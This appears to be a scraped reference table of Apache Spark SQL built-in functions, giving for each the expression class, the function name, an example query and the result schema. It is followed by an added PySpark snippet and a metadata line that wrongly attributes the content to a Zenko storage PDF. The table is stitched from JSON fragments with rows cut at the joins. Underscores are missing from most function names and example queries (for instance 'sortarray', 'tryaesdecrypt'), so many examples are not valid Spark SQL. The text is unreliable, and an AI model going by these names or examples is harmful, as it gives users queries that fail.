shuffle | SELECT shuffle(array(1, 20, 3, 5)) | struct<shuffle(array(1, 20, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.Signum | sign | SELECT sign(40) | struct<sign(40):double> | | org.apache.spark.sql.catalyst.expressions.Signum | signum | SELECT signum(40) | struct<SIGNUM(40):double> | | org.apache.spark.sql.catalyst.expressions.Sin | sin | SELECT sin(0) | struct<SIN(0):double> | | org.apache.spark.sql.catalyst.expressions.Sinh | sinh | SELECT sinh(0) | struct<SINH(0):double> | | org.apache.spark.sql.catalyst.expressions.Size | cardinality | SELECT cardinality(array('b', 'd', 'c', 'a')) | struct<cardinality(array(b, d, c, a)):int> | | org.apache.spark.sql.catalyst.expressions.Size | size | SELECT size(array('b', 'd', 'c', 'a')) | struct<size(array(b, d, c, 
a)):int> | | org.apache.spark.sql.catalyst.expressions.Slice | slice | SELECT slice(array(1, 2, 3, 4), 2, 2) | struct<slice(array(1, 2, 3, 4), 2, 2):array<int>> | | org.apache.spark.sql.catalyst.expressions.SortArray | sortarray | SELECT sortarray(array('b', 'd', null, 'c', 'a'), true) | struct<sort_array(array(b, d, NULL, c, a), true):array<string>> | | org.apache.spark.sql.catalyst.expressions.SoundEx | soundex | SELECT soundex('Miller') | struct<soundex(Miller):string> | | org.apache.spark.sql.catalyst.expressions.SparkPartitionID | sparkpartitionid | SELECT sparkpartitionid() | struct<SPARKPARTITIONID():int> | | org.apache.spark.sql.catalyst.expressions.SparkVersion | version | SELECT version() | struct<version():string> | | org.apache.spark.sql.catalyst.expressions.SplitPart | splitpart | SELECT splitpart('11.12.13', '.', 3) | struct<split_part(11.12.13, ., 3):string> | | org.apache.spark.sql.catalyst.expressions.Sqrt | sqrt | SELECT sqrt(4) | struct<SQRT(4):double> | | org.apache.spark.sql.catalyst.expressions.Stack | stack | SELECT stack(2, 1, 2, 3) | struct<col0:int,col1:int> | | org.apache.spark.sql.catalyst.expressions.StartsWithExpressionBuilder | startswith | SELECT startswith('Spark SQL', 'Spark') | struct<startswith(Spark SQL, Spark):boolean> | | org.apache.spark.sql.catalyst.expressions.StringInstr | instr | SELECT instr('SparkSQL', 'SQL') | struct<instr(SparkSQL, SQL):int> | | org.apache.spark.sql.catalyst.expressions.StringLocate | locate | SELECT locate('bar', 'foobarbar') | struct<locate(bar, foobarbar, 1):int> | |" }, { "data": "| position | SELECT position('bar', 'foobarbar') | struct<position(bar, foobarbar, 1):int> | | org.apache.spark.sql.catalyst.expressions.StringRepeat | repeat | SELECT repeat('123', 2) | struct<repeat(123, 2):string> | | org.apache.spark.sql.catalyst.expressions.StringReplace | replace | SELECT replace('ABCabc', 'abc', 'DEF') | struct<replace(ABCabc, abc, DEF):string> | | org.apache.spark.sql.catalyst.expressions.StringSpace | space | SELECT concat(space(2), '1') | struct<concat(space(2), 1):string> | | org.apache.spark.sql.catalyst.expressions.StringSplit | split | SELECT split('oneAtwoBthreeC', '[ABC]') | struct<split(oneAtwoBthreeC, [ABC], -1):array<string>> | | org.apache.spark.sql.catalyst.expressions.StringToMap | strtomap | SELECT strtomap('a:1,b:2,c:3', ',', ':') | struct<strtomap(a:1,b:2,c:3, ,, :):map<string,string>> | | org.apache.spark.sql.catalyst.expressions.StringTranslate | translate | SELECT translate('AaBbCc', 'abc', '123') | struct<translate(AaBbCc, abc, 123):string> | | org.apache.spark.sql.catalyst.expressions.StringTrim | trim | SELECT trim(' SparkSQL ') | struct<trim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimBoth | btrim | SELECT btrim(' SparkSQL ') | struct<btrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimLeft | ltrim | SELECT ltrim(' SparkSQL ') | struct<ltrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimRight | rtrim | SELECT rtrim(' SparkSQL ') | struct<rtrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StructsToCsv | tocsv | SELECT tocsv(namedstruct('a', 1, 'b', 2)) | struct<tocsv(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.StructsToJson | tojson | SELECT tojson(namedstruct('a', 1, 'b', 2)) | struct<tojson(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.StructsToXml | toxml | SELECT toxml(namedstruct('a', 1, 'b', 2)) | 
struct<toxml(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.Substring | substr | SELECT substr('Spark SQL', 5) | struct<substr(Spark SQL, 5, 2147483647):string> | | org.apache.spark.sql.catalyst.expressions.Substring | substring | SELECT substring('Spark SQL', 5) | struct<substring(Spark SQL, 5, 2147483647):string> | | org.apache.spark.sql.catalyst.expressions.SubstringIndex | substringindex | SELECT substringindex('www.apache.org', '.', 2) | struct<substring_index(www.apache.org, ., 2):string> | | org.apache.spark.sql.catalyst.expressions.Subtract | - | SELECT 2 - 1 | struct<(2 - 1):int> | | org.apache.spark.sql.catalyst.expressions.Tan | tan | SELECT tan(0) | struct<TAN(0):double> | | org.apache.spark.sql.catalyst.expressions.Tanh | tanh | SELECT tanh(0) | struct<TANH(0):double> | | org.apache.spark.sql.catalyst.expressions.TimeWindow | window | SELECT a, window.start, window.end, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:06:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, window(b, '5 minutes') ORDER BY a, start | struct<a:string,start:timestamp,end:timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.ToBinary | tobinary | SELECT tobinary('abc', 'utf-8') | struct<to_binary(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.ToCharacterBuilder | tochar | SELECT tochar(454, '999') | struct<to_char(454, 999):string> | | org.apache.spark.sql.catalyst.expressions.ToCharacterBuilder | tovarchar | SELECT tovarchar(454, '999') | struct<to_char(454, 999):string> | | org.apache.spark.sql.catalyst.expressions.ToDegrees | degrees | SELECT degrees(3.141592653589793) | struct<DEGREES(3.141592653589793):double> | | org.apache.spark.sql.catalyst.expressions.ToNumber | tonumber | SELECT tonumber('454', '999') | struct<to_number(454, 999):decimal(3,0)> | | org.apache.spark.sql.catalyst.expressions.ToRadians | radians | SELECT radians(180) | struct<RADIANS(180):double> | | org.apache.spark.sql.catalyst.expressions.ToUTCTimestamp | toutctimestamp | SELECT toutctimestamp('2016-08-31', 'Asia/Seoul') | struct<toutctimestamp(2016-08-31, Asia/Seoul):timestamp> | | org.apache.spark.sql.catalyst.expressions.ToUnixTimestamp | tounixtimestamp | SELECT tounixtimestamp('2016-04-08', 'yyyy-MM-dd') | struct<tounixtimestamp(2016-04-08, yyyy-MM-dd):bigint> | | org.apache.spark.sql.catalyst.expressions.TransformKeys | transformkeys | SELECT transformkeys(mapfromarrays(array(1, 2, 3), array(1, 2, 3)), (k, v) -> k + 1) | struct<transformkeys(mapfrom_arrays(array(1, 2, 3), array(1, 2, 3)), lambdafunction((namedlambdavariable() + 1), namedlambdavariable(), namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.TransformValues | transformvalues | SELECT transformvalues(mapfromarrays(array(1, 2, 3), array(1, 2, 3)), (k, v) -> v + 1) | struct<transformvalues(mapfrom_arrays(array(1, 2, 3), array(1, 2, 3)), lambdafunction((namedlambdavariable() + 1), namedlambdavariable(), namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.TruncDate | trunc | SELECT trunc('2019-08-04', 'week') | struct<trunc(2019-08-04, week):date> | | org.apache.spark.sql.catalyst.expressions.TruncTimestamp | datetrunc | SELECT datetrunc('YEAR', '2015-03-05T09:32:05.359') | struct<date_trunc(YEAR, 2015-03-05T09:32:05.359):timestamp> | | org.apache.spark.sql.catalyst.expressions.TryAdd | tryadd | SELECT tryadd(1, 2) | struct<try_add(1, 2):int> | | 
org.apache.spark.sql.catalyst.expressions.TryAesDecrypt | tryaesdecrypt | SELECT tryaesdecrypt(unhex('6E7CA17BBB468D3084B5744BCA729FB7B2B7BCB8E4472847D02670489D95FA97DBBA7D3210'), '0000111122223333', 'GCM') | struct<tryaesdecrypt(unhex(6E7CA17BBB468D3084B5744BCA729FB7B2B7BCB8E4472847D02670489D95FA97DBBA7D3210), 0000111122223333, GCM, DEFAULT, ):binary> | | org.apache.spark.sql.catalyst.expressions.TryDivide | trydivide | SELECT trydivide(3, 2) | struct<try_divide(3, 2):double> | | org.apache.spark.sql.catalyst.expressions.TryElementAt | tryelementat | SELECT tryelementat(array(1, 2, 3), 2) | struct<tryelementat(array(1, 2, 3), 2):int> | | org.apache.spark.sql.catalyst.expressions.TryMultiply | trymultiply | SELECT trymultiply(2, 3) | struct<try_multiply(2, 3):int> | | org.apache.spark.sql.catalyst.expressions.TryReflect | tryreflect | SELECT tryreflect('java.util.UUID', 'randomUUID') | struct<try_reflect(java.util.UUID, randomUUID):string> | |" }, { "data": "| tryremainder | SELECT tryremainder(3, 2) | struct<try_remainder(3, 2):int> | | org.apache.spark.sql.catalyst.expressions.TrySubtract | trysubtract | SELECT trysubtract(2, 1) | struct<try_subtract(2, 1):int> | | org.apache.spark.sql.catalyst.expressions.TryToBinary | trytobinary | SELECT trytobinary('abc', 'utf-8') | struct<trytobinary(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.TryToNumber | trytonumber | SELECT trytonumber('454', '999') | struct<trytonumber(454, 999):decimal(3,0)> | | org.apache.spark.sql.catalyst.expressions.TryToTimestampExpressionBuilder | trytotimestamp | SELECT trytotimestamp('2016-12-31 00:12:00') | struct<trytotimestamp(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.TypeOf | typeof | SELECT typeof(1) | struct<typeof(1):string> | | org.apache.spark.sql.catalyst.expressions.UnBase64 | unbase64 | SELECT unbase64('U3BhcmsgU1FM') | struct<unbase64(U3BhcmsgU1FM):binary> | | org.apache.spark.sql.catalyst.expressions.UnaryMinus | negative | SELECT negative(1) | struct<negative(1):int> | | org.apache.spark.sql.catalyst.expressions.UnaryPositive | positive | SELECT positive(1) | struct<(+ 1):int> | | org.apache.spark.sql.catalyst.expressions.Unhex | unhex | SELECT decode(unhex('537061726B2053514C'), 'UTF-8') | struct<decode(unhex(537061726B2053514C), UTF-8):string> | | org.apache.spark.sql.catalyst.expressions.UnixDate | unixdate | SELECT unixdate(DATE(\"1970-01-02\")) | struct<unix_date(1970-01-02):int> | | org.apache.spark.sql.catalyst.expressions.UnixMicros | unixmicros | SELECT unixmicros(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_micros(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixMillis | unixmillis | SELECT unixmillis(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_millis(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixSeconds | unixseconds | SELECT unixseconds(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_seconds(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixTimestamp | unixtimestamp | SELECT unixtimestamp() | struct<unixtimestamp(currenttimestamp(), yyyy-MM-dd HH:mm:ss):bigint> | | org.apache.spark.sql.catalyst.expressions.Upper | ucase | SELECT ucase('SparkSql') | struct<ucase(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Upper | upper | SELECT upper('SparkSql') | struct<upper(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.UrlDecode | urldecode | SELECT urldecode('https%3A%2F%2Fspark.apache.org') | 
struct<url_decode(https%3A%2F%2Fspark.apache.org):string> | | org.apache.spark.sql.catalyst.expressions.UrlEncode | urlencode | SELECT urlencode('https://spark.apache.org') | struct<url_encode(https://spark.apache.org):string> | | org.apache.spark.sql.catalyst.expressions.Uuid | uuid | SELECT uuid() | struct<uuid():string> | | org.apache.spark.sql.catalyst.expressions.WeekDay | weekday | SELECT weekday('2009-07-30') | struct<weekday(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.WeekOfYear | weekofyear | SELECT weekofyear('2008-02-20') | struct<weekofyear(2008-02-20):int> | | org.apache.spark.sql.catalyst.expressions.WidthBucket | widthbucket | SELECT widthbucket(5.3, 0.2, 10.6, 5) | struct<width_bucket(5.3, 0.2, 10.6, 5):bigint> | | org.apache.spark.sql.catalyst.expressions.WindowTime | windowtime | SELECT a, window.start as start, window.end as end, windowtime(window), cnt FROM (SELECT a, window, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:06:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, window(b, '5 minutes') ORDER BY a, window.start) | struct<a:string,start:timestamp,end:timestamp,window_time(window):timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.XmlToStructs | fromxml | SELECT fromxml('<p><a>1</a><b>0.8</b></p>', 'a INT, b DOUBLE') | struct<from_xml(<p><a>1</a><b>0.8</b></p>):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.XxHash64 | xxhash64 | SELECT xxhash64('Spark', array(123), 2) | struct<xxhash64(Spark, array(123), 2):bigint> | | org.apache.spark.sql.catalyst.expressions.Year | year | SELECT year('2016-07-30') | struct<year(2016-07-30):int> | | org.apache.spark.sql.catalyst.expressions.ZipWith | zipwith | SELECT zipwith(array(1, 2, 3), array('a', 'b', 'c'), (x, y) -> (y, x)) | struct<zipwith(array(1, 2, 3), array(a, b, c), lambdafunction(namedstruct(y, namedlambdavariable(), x, namedlambdavariable()), namedlambdavariable(), namedlambdavariable())):array<struct<y:string,x:int>>> | | org.apache.spark.sql.catalyst.expressions.aggregate.AnyValue | anyvalue | SELECT anyvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<any_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.ApproximatePercentile | approxpercentile | SELECT approxpercentile(col, array(0.5, 0.4, 0.1), 100) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<approx_percentile(col, array(0.5, 0.4, 0.1), 100):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.ApproximatePercentile | percentileapprox | SELECT percentileapprox(col, array(0.5, 0.4, 0.1), 100) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<percentile_approx(col, array(0.5, 0.4, 0.1), 100):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.Average | avg | SELECT avg(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<avg(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Average | mean | SELECT mean(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<mean(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitAndAgg | bitand | SELECT bitand(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_and(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitOrAgg | bitor | SELECT bitor(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_or(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitXorAgg | bitxor | SELECT bitxor(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_xor(col):int> | | 
org.apache.spark.sql.catalyst.expressions.aggregate.BoolAnd | booland | SELECT booland(col) FROM VALUES (true), (true), (true) AS tab(col) | struct<bool_and(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolAnd | every | SELECT every(col) FROM VALUES (true), (true), (true) AS tab(col) | struct<every(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolOr | any | SELECT any(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<any(col):boolean> | |" }, { "data": "| boolor | SELECT boolor(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<bool_or(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolOr | some | SELECT some(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<some(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectList | arrayagg | SELECT arrayagg(col) FROM VALUES (1), (2), (1) AS tab(col) | struct<collect_list(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectList | collectlist | SELECT collectlist(col) FROM VALUES (1), (2), (1) AS tab(col) | struct<collect_list(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectSet | collectset | SELECT collectset(col) FROM VALUES (1), (2), (1) AS tab(col) | struct<collect_set(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.Corr | corr | SELECT corr(c1, c2) FROM VALUES (3, 2), (3, 3), (6, 4) as tab(c1, c2) | struct<corr(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Count | count | SELECT count(*) FROM VALUES (NULL), (5), (5), (20) AS tab(col) | struct<count(1):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.CountIf | countif | SELECT countif(col % 2 = 0) FROM VALUES (NULL), (0), (1), (2), (3) AS tab(col) | struct<count_if(((col % 2) = 0)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.CountMinSketchAggExpressionBuilder | countminsketch | SELECT hex(countminsketch(col, 0.5d, 0.5d, 1)) FROM VALUES (1), (2), (1) AS tab(col) | struct<hex(countminsketch(col, 0.5, 0.5, 1)):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.CovPopulation | covarpop | SELECT covarpop(c1, c2) FROM VALUES (1,1), (2,2), (3,3) AS tab(c1, c2) | struct<covar_pop(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.CovSample | covarsamp | SELECT covarsamp(c1, c2) FROM VALUES (1,1), (2,2), (3,3) AS tab(c1, c2) | struct<covar_samp(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.First | first | SELECT first(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<first(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.First | firstvalue | SELECT firstvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<first_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.HistogramNumeric | histogramnumeric | SELECT histogramnumeric(col, 5) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<histogram_numeric(col, 5):array<struct<x:int,y:double>>> | | org.apache.spark.sql.catalyst.expressions.aggregate.HllSketchAgg | hllsketchagg | SELECT hllsketchestimate(hllsketchagg(col, 12)) FROM VALUES (1), (1), (2), (2), (3) tab(col) | struct<hllsketchestimate(hllsketchagg(col, 12)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.HllUnionAgg | hllunionagg | SELECT hllsketchestimate(hllunionagg(sketch, true)) FROM (SELECT hllsketchagg(col) as sketch FROM VALUES (1) tab(col) UNION ALL SELECT hllsketchagg(col, 20) as sketch FROM 
VALUES (1) tab(col)) | struct<hllsketchestimate(hllunionagg(sketch, true)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.HyperLogLogPlusPlus | approxcountdistinct | SELECT approxcountdistinct(col1) FROM VALUES (1), (1), (2), (2), (3) tab(col1) | struct<approxcountdistinct(col1):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.Kurtosis | kurtosis | SELECT kurtosis(col) FROM VALUES (-10), (-20), (100), (1000) AS tab(col) | struct<kurtosis(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Last | last | SELECT last(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<last(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Last | lastvalue | SELECT lastvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<last_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Max | max | SELECT max(col) FROM VALUES (10), (50), (20) AS tab(col) | struct<max(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.MaxBy | maxby | SELECT maxby(x, y) FROM VALUES ('a', 10), ('b', 50), ('c', 20) AS tab(x, y) | struct<max_by(x, y):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.Median | median | SELECT median(col) FROM VALUES (0), (10) AS tab(col) | struct<median(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Min | min | SELECT min(col) FROM VALUES (10), (-1), (20) AS tab(col) | struct<min(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.MinBy | minby | SELECT minby(x, y) FROM VALUES ('a', 10), ('b', 50), ('c', 20) AS tab(x, y) | struct<min_by(x, y):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.ModeBuilder | mode | SELECT mode(col) FROM VALUES (0), (10), (10) AS tab(col) | struct<mode(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Percentile | percentile | SELECT percentile(col, 0.3) FROM VALUES (0), (10) AS tab(col) | struct<percentile(col, 0.3, 1):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.PercentileContBuilder | percentilecont | SELECT percentilecont(0.25) WITHIN GROUP (ORDER BY col) FROM VALUES (0), (10) AS tab(col) | struct<percentile_cont(0.25) WITHIN GROUP (ORDER BY col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.PercentileDiscBuilder | percentiledisc | SELECT percentiledisc(0.25) WITHIN GROUP (ORDER BY col) FROM VALUES (0), (10) AS tab(col) | struct<percentile_disc(0.25) WITHIN GROUP (ORDER BY col):double> | |" }, { "data": "| regravgx | SELECT regravgx(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_avgx(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrAvgY | regravgy | SELECT regravgy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_avgy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrCount | regrcount | SELECT regrcount(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_count(y, x):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrIntercept | regrintercept | SELECT regrintercept(y, x) FROM VALUES (1,1), (2,2), (3,3) AS tab(y, x) | struct<regr_intercept(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrR2 | regrr2 | SELECT regrr2(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_r2(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSXX | regrsxx | SELECT regrsxx(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_sxx(y, x):double> | 
| org.apache.spark.sql.catalyst.expressions.aggregate.RegrSXY | regrsxy | SELECT regrsxy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_sxy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSYY | regrsyy | SELECT regrsyy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_syy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSlope | regrslope | SELECT regrslope(y, x) FROM VALUES (1,1), (2,2), (3,3) AS tab(y, x) | struct<regr_slope(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Skewness | skewness | SELECT skewness(col) FROM VALUES (-10), (-20), (100), (1000) AS tab(col) | struct<skewness(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevPop | stddevpop | SELECT stddevpop(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev_pop(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | std | SELECT std(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<std(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | stddev | SELECT stddev(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | stddevsamp | SELECT stddevsamp(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev_samp(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Sum | sum | SELECT sum(col) FROM VALUES (5), (10), (15) AS tab(col) | struct<sum(col):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.TryAverageExpressionBuilder | tryavg | SELECT tryavg(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<try_avg(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.TrySumExpressionBuilder | trysum | SELECT trysum(col) FROM VALUES (5), (10), (15) AS tab(col) | struct<try_sum(col):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.VariancePop | varpop | SELECT varpop(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<var_pop(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.VarianceSamp | varsamp | SELECT varsamp(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<var_samp(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.VarianceSamp | variance | SELECT variance(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<variance(col):double> | | org.apache.spark.sql.catalyst.expressions.variant.IsVariantNull | isvariantnull | SELECT isvariantnull(parsejson('null')) | struct<isvariantnull(parsejson(null)):boolean> | | org.apache.spark.sql.catalyst.expressions.variant.ParseJsonExpressionBuilder | parsejson | SELECT parsejson('{\"a\":1,\"b\":0.8}') | struct<parse_json({\"a\":1,\"b\":0.8}):variant> | | org.apache.spark.sql.catalyst.expressions.variant.SchemaOfVariant | schemaofvariant | SELECT schemaofvariant(parsejson('null')) | struct<schemaofvariant(parsejson(null)):string> | | org.apache.spark.sql.catalyst.expressions.variant.SchemaOfVariantAgg | schemaofvariantagg | SELECT schemaofvariantagg(parsejson(j)) FROM VALUES ('1'), ('2'), ('3') AS tab(j) | struct<schemaofvariantagg(parse_json(j)):string> | | org.apache.spark.sql.catalyst.expressions.variant.TryParseJsonExpressionBuilder | tryparsejson | SELECT tryparsejson('{\"a\":1,\"b\":0.8}') | struct<tryparsejson({\"a\":1,\"b\":0.8}):variant> | | org.apache.spark.sql.catalyst.expressions.variant.TryVariantGetExpressionBuilder | tryvariantget | SELECT tryvariantget(parsejson('{\"a\": 1}'), '$.a', 'int') | 
struct<tryvariantget(parsejson({\"a\": 1}), $.a):int> | | org.apache.spark.sql.catalyst.expressions.variant.VariantGetExpressionBuilder | variantget | SELECT variantget(parsejson('{\"a\": 1}'), '$.a', 'int') | struct<variantget(parse_json({\"a\": 1}), $.a):int> | | org.apache.spark.sql.catalyst.expressions.xml.XPathBoolean | xpathboolean | SELECT xpathboolean('<a><b>1</b></a>','a/b') | struct<xpath_boolean(<a><b>1</b></a>, a/b):boolean> | | org.apache.spark.sql.catalyst.expressions.xml.XPathDouble | xpathdouble | SELECT xpathdouble('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_double(<a><b>1</b><b>2</b></a>, sum(a/b)):double> | | org.apache.spark.sql.catalyst.expressions.xml.XPathDouble | xpathnumber | SELECT xpathnumber('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_number(<a><b>1</b><b>2</b></a>, sum(a/b)):double> | | org.apache.spark.sql.catalyst.expressions.xml.XPathFloat | xpathfloat | SELECT xpathfloat('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_float(<a><b>1</b><b>2</b></a>, sum(a/b)):float> | | org.apache.spark.sql.catalyst.expressions.xml.XPathInt | xpathint | SELECT xpathint('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_int(<a><b>1</b><b>2</b></a>, sum(a/b)):int> | | org.apache.spark.sql.catalyst.expressions.xml.XPathList | xpath | SELECT xpath('<a><b>b1</b><b>b2</b><b>b3</b><c>c1</c><c>c2</c></a>','a/b/text()') | struct<xpath(<a><b>b1</b><b>b2</b><b>b3</b><c>c1</c><c>c2</c></a>, a/b/text()):array<string>> | | org.apache.spark.sql.catalyst.expressions.xml.XPathLong | xpathlong | SELECT xpathlong('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_long(<a><b>1</b><b>2</b></a>, sum(a/b)):bigint> | | org.apache.spark.sql.catalyst.expressions.xml.XPathShort | xpathshort | SELECT xpathshort('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_short(<a><b>1</b><b>2</b></a>, sum(a/b)):smallint> | | org.apache.spark.sql.catalyst.expressions.xml.XPathString | xpathstring | SELECT xpathstring('<a><b>b</b><c>cc</c></a>','a/c') | struct<xpath_string(<a><b>b</b><c>cc</c></a>, a/c):string> |" } ]
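The table above is a generated catalog of built-in expressions, each with an example SELECT and its result schema. The following is a minimal sketch, not part of the generated reference, showing how a few of those examples can be run from PySpark; it assumes only a local Spark installation. Note that the actual function names carry underscores (e.g. `try_divide`, `unix_date`, `xpath_string`), as the result-schema column shows, even where the table text above dropped them.

```python
# Minimal sketch (editorial, not from the reference table): run a few of the
# documented example queries through a local SparkSession.
from pyspark.sql import SparkSession

spark = SparkSession.builder.appName("builtin-function-examples").getOrCreate()

# Examples taken from the table's SELECT column, with underscored names restored.
spark.sql("SELECT try_divide(3, 2)").show()                                  # 1.5
spark.sql('SELECT unix_date(DATE("1970-01-02"))').show()                     # 1
spark.sql("SELECT xpath_string('<a><b>b</b><c>cc</c></a>', 'a/c')").show()   # cc

# DESCRIBE FUNCTION shows the documented usage for any entry in the table.
spark.sql("DESCRIBE FUNCTION EXTENDED try_divide").show(truncate=False)

spark.stop()
```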
{ "category": "Runtime", "file_name": "Zenko_hi-level.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
